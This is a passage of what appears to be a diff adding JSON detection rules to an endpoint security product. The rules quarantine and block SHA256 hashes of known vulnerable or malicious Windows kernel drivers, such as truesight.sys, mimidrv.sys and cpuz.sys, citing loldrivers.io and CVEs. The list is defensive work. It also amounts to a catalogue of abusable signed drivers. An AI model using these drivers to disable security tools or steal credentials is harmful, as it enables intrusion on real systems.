rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c70086a3-55d7-5b4c-8f98-6caca139a5ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458372Z", + "creation_date": "2026-03-23T11:45:30.458375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d640783395631c1b4878ac7945f227c4c4f64fe26dd30cbed755dc440931e85", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c707ff43-a1f1-5727-b9ed-a8bffbd035ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483436Z", + "creation_date": "2026-03-23T11:45:31.483440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483450Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d05196b08b66c4bf94dd48b6ff4f5702af5ce08c9e8cb40d7003a5be36636adb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c708acf4-da75-5da9-a438-6f36920f4302", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455669Z", + "creation_date": "2026-03-23T11:45:30.455673Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ac08a6035cfcafdac712d7c3cf2eef6e10258f14cee6e80e1ef2f71f5045173", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c71cd79f-8bd4-5d3d-a6cf-c9f3c6df82ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466495Z", + "creation_date": "2026-03-23T11:45:30.466498Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95e5b5500e63c31c6561161a82f7f9373f99b5b1f54b018c4866df4f2a879167", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7282470-80ce-5051-a8bb-0c508242200e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826262Z", + "creation_date": "2026-03-23T11:45:30.826265Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826270Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c360ca22ac7cc6d6d307d7bfb8179021942d5d80b32536cf644753a4b3201139", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c729f119-7a95-5ae4-910b-5a47a3c965b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160685Z", + "creation_date": "2026-03-23T11:45:31.160687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04d1544916acf49af24dde775f6a733f9e6e6b9ecc15205429c9e651e5825ee6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c73163f2-a977-548c-8268-6feed478acc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831695Z", + "creation_date": "2026-03-23T11:45:30.831697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831702Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a3cf88acf373c48ce7b9994d9178b167c26b78925bec161179c2b67d57cf438", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c73980bc-4860-517e-97f4-2d51f6d7eb4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497633Z", + "creation_date": "2026-03-23T11:45:31.497635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32b31efcb4501bbf20ced801dbba29f6bddccf7ff67faa593fc97025ff37f41f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c73b6387-005e-51c7-8d67-ac67f70a17eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610194Z", + "creation_date": "2026-03-23T11:45:29.610196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610201Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a13578aa1c9896c3753047ea05fd6a98af11044a544b0ad641bf3e15369c7601", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c743cc7b-ffde-5b7f-874d-14ad08b8c347", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461381Z", + "creation_date": "2026-03-23T11:45:30.461384Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d8ff25255202321bd00f7aa792800e1fb7aab506dca771a4a8e2cc1af265fa15", + "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c74ec9dc-7e37-584f-94ca-618dd7307e68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814235Z", + "creation_date": "2026-03-23T11:45:31.814238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814246Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66687204c5683cd336e2af70f36f4bace8f1ea140617586f2bd923d2dcde76b5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7533662-92f0-5719-a8a8-2bb1abf870ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498415Z", + "creation_date": "2026-03-23T11:45:31.498419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498427Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e37c23ba30bfbf296bc6ff82cebd5a007f96e512dce4c384e9330c99b4474d24", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c758dfb4-8387-5019-aa04-9be63554c24d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148852Z", + "creation_date": "2026-03-23T11:45:31.148854Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148860Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81430b45a27126a4de491b6afbdd4dcb93b4a03c92490735fa412bfdd907a6ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c75a0cfd-fc25-5a39-8d76-3c93ee5474fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153310Z", + "creation_date": "2026-03-23T11:45:31.153314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc740973f3bb30cdc702f350fadb92a7bfd6b68b1625e96b16c15faadc589e32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7630799-cca9-5177-abed-886926039931", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455528Z", + "creation_date": 
"2026-03-23T11:45:30.455532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455540Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec9bd7fb90c3a2aa4605bd73fe1f74399e2cda75fd4c5fff84660ad4f797c4fe", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c764d18c-4400-504c-9778-b43102007609", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971767Z", + "creation_date": "2026-03-23T11:45:29.971769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971774Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184", + "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c768da48-5ff7-57b1-8771-facb010b3644", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143290Z", + "creation_date": "2026-03-23T11:45:31.143292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "688420dc64baecc92f9326418e6f178f60c5468a333ecd68f11618aab2f9612a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c76c3997-a1f6-56f4-ac8a-10635632ef19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463585Z", + "creation_date": "2026-03-23T11:45:30.463589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463598Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "30e083cd7616b1b969a92fd18cf03097735596cce7fcf3254b2ca344e526acc2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c78ea98d-18e1-5e27-9d4a-a8165fb0cefb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473425Z", + "creation_date": "2026-03-23T11:45:30.473429Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84c5f6ddd9c90de873236205b59921caabb57ac6f7a506abbe2ce188833bbe51", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c796c22d-ab65-594d-8731-8ce2d9eaa5ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159616Z", + "creation_date": "2026-03-23T11:45:31.159618Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "722f0f8b1c285e438c4b679d9db4372c6235ee6886a0bd05222db7dfe59497d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7b995d8-f087-57da-8a52-dd073f2b18b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974264Z", + "creation_date": "2026-03-23T11:45:29.974266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974271Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3847a1ed764ba25361a1748761fd9a1cbb65e42db00094f8ad6def9ac5da4116", + "comment": "Trend Micro Anti-Rootkit Common Module 
vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7bca650-ec00-5115-9c31-60c250eb62c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473689Z", + "creation_date": "2026-03-23T11:45:30.473692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5c8521c00f0a9003d3f91abb0b881e8657ba5f5cf74a1223a88499a85916e68", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7c7212a-a7bf-59cf-b59b-ac3a55c40888", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818651Z", + "creation_date": 
"2026-03-23T11:45:31.818655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2891d9f9bd5037598ad6441fb92fbe283afcd5b538f022583cf1bbb881d7a693", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c7d38e76-8ce5-5909-86e1-9edb09c7c4f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152109Z", + "creation_date": "2026-03-23T11:45:31.152112Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23c787b0a5c706dedf083f0d219ef18ec07a62b33bcd6016e2e66d0b7b3009cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
